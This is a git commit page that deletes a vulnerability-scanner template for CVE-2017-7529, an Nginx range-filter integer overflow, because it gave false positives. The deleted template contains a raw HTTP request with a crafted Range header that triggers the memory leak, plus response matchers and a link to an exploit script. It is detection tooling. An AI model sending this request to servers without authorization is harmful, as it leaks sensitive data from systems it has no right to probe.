remvoing cve-2017-7529
This can be precisely checked only when Nginx version is known, otherwise it will produce false positives results, as such removing this template for the time being.patch-1
parent
a2d60bbd1e
commit
0aee5a9715
|
@ -1,33 +0,0 @@
|
|||
id: cve-2017-7529
|
||||
info:
|
||||
author: "Harsh Bothra & @dwisiswant0"
|
||||
name: "Nginx Remote Integer Overflow"
|
||||
severity: medium
|
||||
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
|
||||
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Range: bytes=-17208,-9223372036854758792
|
||||
Connection: close
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 206
|
||||
- type: word
|
||||
words:
|
||||
- "Server: nginx"
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Range"
|
||||
part: body
|
Loading…
Reference in New Issue